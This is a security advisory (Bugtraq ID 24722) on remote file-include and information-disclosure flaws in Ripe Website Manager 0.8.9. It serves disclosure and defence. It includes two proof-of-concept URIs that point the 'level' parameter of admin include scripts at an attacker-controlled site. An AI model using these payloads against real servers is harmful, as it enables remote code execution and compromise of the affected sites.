Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities
BID:24722
Info
Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities
| Bugtraq ID: | 24722 |
| Class: | Unknown |
| CVE: |
CVE-2007-3525 CVE-2007-3524 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 02 2007 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | BlackNDoor and an anounymous researcher are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Ripe Website Manager Ripe Website Manager 0.8.9 |
| Not Vulnerable: | |
Discussion
Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities
Ripe Website Manager is prone to multiple vulnerabilities, including remote file-include issues and an information-disclosure issue, because the application fails to sufficiently sanitize user-supplied input and because of a desing error.
Exploiting these issues may allow an attacker to compromise the application and the underlying system as well as access sensitive information that may aid in further attacks.
These issues are reported to affect Ripe Website Manager 0.8.9 and earlier versions.
Ripe Website Manager is prone to multiple vulnerabilities, including remote file-include issues and an information-disclosure issue, because the application fails to sufficiently sanitize user-supplied input and because of a desing error.
Exploiting these issues may allow an attacker to compromise the application and the underlying system as well as access sensitive information that may aid in further attacks.
These issues are reported to affect Ripe Website Manager 0.8.9 and earlier versions.
Exploit / POC
Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path to ripe]/admin/includes/author_panel_header.php?level=attacker site
http://www.example.com/[path to ripe]/admin/includes/admin_header.php?level=attacker site
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/[path to ripe]/admin/includes/author_panel_header.php?level=attacker site
http://www.example.com/[path to ripe]/admin/includes/admin_header.php?level=attacker site
Solution / Fix
Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities
References:
References:
- Ripe Website Manager Homepage (Ripe Website Manager )